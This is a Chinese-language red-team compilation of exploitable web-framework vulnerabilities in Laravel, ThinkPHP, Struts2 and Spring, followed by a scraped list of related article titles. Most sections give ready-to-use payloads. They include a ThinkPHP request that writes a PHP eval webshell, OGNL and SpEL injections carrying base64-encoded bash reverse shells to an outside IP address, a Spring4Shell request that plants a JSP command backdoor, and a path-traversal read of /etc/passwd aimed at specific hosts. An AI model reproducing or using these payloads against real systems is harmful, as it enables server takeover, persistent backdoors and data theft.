1 Laravel

Laravel是一套简洁、优雅的PHP Web开发框架(PHP Web Framework)。

1.1 CVE-2021-3129 RCE

影响版本:Laravel <= 8.4.2

工具地址:https://github.com/zhzyker/CVE-2021-3129

https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP


2 Thinkphp

ThinkPHP是一套开源的、基于PHP的轻量级Web应用开发框架

2.1 Thinkphp-3.X RCE-6.X RCE

综合工具:武器库-Thinkphp专检(3-6版本)

直接使用小王子工具库中可一键出结果。

2.2 6.X lang RCE

复现文档:https://blog.csdn.net/m0_71518346/article/details/128360317

漏洞poc

?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/<?=@eval($_REQUEST['x']);?>+/var/www/html/x.php


3 Struct2

Apache Struts2框架是一个使用JavaEE网络应用程序的Web框架。可能存在OGNL表达注入扩展,从而造成远程代码执行,风险极大。

3.1 struts2 代码执行 CVE-2020-17530

影响版本:Apache Struts 2.0.0 - 2.5.25

工具地址:https://github.com/YanMu2020/s2-062

复现示例

python .\s2-062.py --url http://47.98.193.176:18588/ --cmd id

3.2 Struts2 代码执行 CVE-2021-31805

影响版本:Apache Struts 2.0.0 - 2.5.29

漏洞poc

Post: /s2_062/index.actionname=(%23request.map%3d%23%40org.apache.commons.collections.BeanMap%40{}).toString().substring(0,0)+%2b(%23request.map.setBean(%23request.get('struts.valueStack'))+%3d%3d+true).toString().substring(0,0)+%2b(%23request.map2%3d%23%40org.apache.commons.collections.BeanMap%40{}).toString().substring(0,0)+%2b(%23request.map2.setBean(%23request.get('map').get('context'))+%3d%3d+true).toString().substring(0,0)+%2b(%23request.map3%3d%23%40org.apache.commons.collections.BeanMap%40{}).toString().substring(0,0)+%2b(%23request.map3.setBean(%23request.get('map2').get('memberAccess'))+%3d%3d+true).toString().substring(0,0)+%2b(%23request.get('map3').put('excludedPackageNames',%23%40org.apache.commons.collections.BeanMap%40{}.keySet())+%3d%3d+true).toString().substring(0,0)+%2b(%23request.get('map3').put('excludedClasses',%23%40org.apache.commons.collections.BeanMap%40{}.keySet())+%3d%3d+true).toString().substring(0,0)+%2b(%23application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'bash -c {echo,%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%30%4e%79%34%35%4e%43%34%79%4d%7a%59%75%4d%54%45%33%4c%7a%55%30%4e%54%51%67%4d%44%34%6d%4d%51%3d%3d}|{base64,-d}|{bash,-i}'}))


4 SpringBoot

4.1 Spring Boot 目录遍历 CVE-2021-21234

Spring-boot-actuator-logview 0.2.13之前版本存在路径遍历漏洞,攻击者可通过该缺陷读取系统任意文件。

复现文章:https://blog.csdn.net/weixin_43165012/article/details/121152482

漏洞poc:直接访问

http://47.98.193.176:8908/manage/log/view?filename=etc/passwd&base=../../../../../../http://127.0.0.1:8887/manage/log/view?filename=/windows/win.ini&base=../../../../../../../

4.2 Spring Cloud Function Spel表达式注入 CVE-2022-22963

Spring Cloud Function提供了一个通用的模型,用于在各种平台上部署基于函数的软件,包括像Amazon AWS Lambda这样的 FaaS(函数即服务,function as a service)平台。

影响版本:3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2

复现文章:https://developer.aliyun.com/article/1160011

漏洞poc

POST:/functionRouterspring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzU1NjYgMD4mMQ==}|{base64,-d}|{bash,-i}")

4.3 Spring Framework远程代码执行漏洞 CVE-2022-22965

Spring Framework是一个开源应用框架,初衷是为了降低应用程序开发的复杂度,具有分层体系结构,允许用户选择组件,同时还为J2EE应用程序开发提供了一个好用的框架。

影响版本

  • Spring Framework < 5.3.18

    • Spring Framework < 5.2.20

      • Spring Framework 的衍生框架构建的网站或应用

复现文章:https://www.csdn.net/article/2022-11-24/128026635

复现过程

1 写后门tomcatwar.jsp

GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1Host: localhost:8080Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Connection: closesuffix: %>//c1: Runtimec2: <%DNT: 1

2 访问jsp触发后门

http://localhost:8080/tomcatwar.jsp?pwd=j&cmd=id

工具项目:https://github.com/BobTheShoplifter/Spring4Shell-PoC

工具示例

python poc.py --url=http://192.168.44.131/

http://192.168.44.131/tomcatwar.jsp?pwd=j&cmd=whoami

4.4 Spring boot命令执行 CVE-2022-22947

Spring Cloud Gateway是Spring中的一个API网关。

复现文章:https://cloud.tencent.com/developer/article/2164533

影响版本

  • Spring Cloud Gateway 3.1.x < 3.1.1

    • Spring Cloud Gateway 3.0.x < 3.0.7

      • 其他旧的、不受支持的Spring Cloud Gateway 版本

2023年红队渗透-开发框架可利用漏洞汇总相关推荐

  1. 【愚公系列】2023年05月 网络安全高级班 040.WEB渗透与安全(红队渗透测试技术分类和工具箱)

    文章目录 前言 一.红队渗透测试技术分类和工具箱 1.红队渗透测试技术分类 1.1 Web安全渗透 1.2 内网安全渗透 1.3 移动安全渗透 1.4 无线安全渗透 1.5 云安全渗透 2.红队渗透测 ...

  2. 【愚公系列】2023年05月 网络安全高级班 038.WEB渗透与安全(红队渗透测试入门指南)

    文章目录 前言 一.背景 1.新型IT基础设施带来全新挑战,安全范畴持续在延伸 2.APT级攻击手段众多,网络空间安全威胁加剧 3.什么是APT攻击 4.传统安全技术与管理应对乏力,众多政企单位陷入困 ...

  3. 攻防演练-某地级市HW攻防测试演练红队渗透测试总结

    某地级市HW攻防演练红队渗透测试总结 文章目录 某地级市HW攻防演练红队渗透测试总结 前言 一.对某目标攻击的复盘 1.Web打点 2.上免杀马反弹shell(Failed) 3.信息收集,数据库提权 ...

  4. 红蓝对抗-红队渗透下的入口权限快速获取

    红队渗透下的入口权限快速获取 文章目录 红队渗透下的入口权限快速获取 前言 红队攻击流程概述 获取入口权限 利用常见组件的漏洞 高危漏洞的检测与攻击 POC的集成与自动化验证 POC bomber 前 ...

  5. 红队渗透工具库-忍者安全系统(NINJUTSU OS v3)系统安装

    红队渗透工具库-忍者安全系统(NINJUTSU OS v3)系统安装 前言 将镜像下载好使用VM安装,我给该系统分配了70个G硬盘,6G内存 镜像下载链接:链接: https://pan.baidu. ...

  6. 【网络安全】手把手给大家演练红队渗透项目

    简介 该项目是以伟大的詹姆斯邦德电影GoldenEye为主题创作的,目标是获取最底层的flag.txt文本信息,该项目作为OSCP考试培训必打的一个项目环境,该作者评定该环境为渗透中级水准难度.接下来 ...

  7. 红队渗透测试技术:如何通过鱼叉式网络钓鱼获得攻击机会?

    关于红队在渗透测试中使用的网络钓鱼攻击的文章很多,不过大多数的介绍都是不完整的.在本文中,我们将对这个话题进行一次完整的梳理,包括域创建,制作网络钓鱼内容,绕过垃圾邮件过滤器和电子邮件网关,生成不可检 ...

  8. 红队渗透-window痕迹清除

    提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一.windows操作系统基础入门 二.windows渗透痕迹清除 1.为避免入侵操作行为被发现时,攻击者往往通过各种 ...

  9. 红队渗透笔记之红队前端语言基础

    文章目录 HTML基础 HTML语法 常用标签介绍 <!DOCTYPE>标签 < head> 标签 < title> 标签 < body> 标签 < ...

  10. 红队渗透靶场之SickOs1.1

    靶场考察知识 shellshock漏洞 shellshock即unix系统下的bash shell的一个漏洞, Bash 4.3以及之前的版本在处理某些构造的环境变量时存在安全漏洞, 向环境变量值内的 ...

最新文章

  1. 运行php能运行asp么,配置使web server即能运行asp又能运行PHP(不装Apache)
  2. Android SharedPreferences保存和读取对象
  3. netty系列之:使用UDP协议
  4. POJ3208-Apocalypse Someday【数位dp】
  5. 平面设计 前端_我如何在5个月内从平面设计师过渡到前端开发人员
  6. etabs数据_etabs使用经验
  7. echarts 三环圆环_echarts实现环形进度图
  8. 我和2000万人在B站刷凤凰传奇
  9. 海外ubuntu,lamp,ftp,phpmyadmin配置
  10. 通过curl访问openstack各服务
  11. eclipse 反编译插件 图文
  12. CMMI3级认证过程记录
  13. meson test 的 --test-args 参数
  14. 屏幕增强字段如何保存修改记录
  15. PTA——基础编程题 | 7-27 冒泡法排序 (20分)
  16. python分析:爬取《灵笼》这部国产动漫弹幕,分析词云!看看网友究竟在说啥?
  17. 白鹭引擎egert+PHP后端手游宠物小精灵题材源码
  18. 深入理解line-height和vertical-align
  19. 述职答辩提问环节一般可以问些什么_述职答辩前
  20. Servlet服务器端程序

热门文章

  1. Ubuntu 16.04 安装英伟达(Nvidia)显卡驱动
  2. 中国古典家具行业市场消费预测及投资风险分析报告2022-2027年
  3. Python:通过编程实现温度的转换
  4. 发现一个可以赚钱的手机应用
  5. python用百度云接口实现车辆识别
  6. 蓝桥杯国赛之PWM互补输出
  7. 排在前十名的人力资源管理系统有哪些?
  8. 用Qemu搭建x86_64学习环境
  9. 微信ui设计 ---添加朋友
  10. 中移链(基于EOS)实战:如何调用RPC接口组装交易、签名、上链以及查询上链结果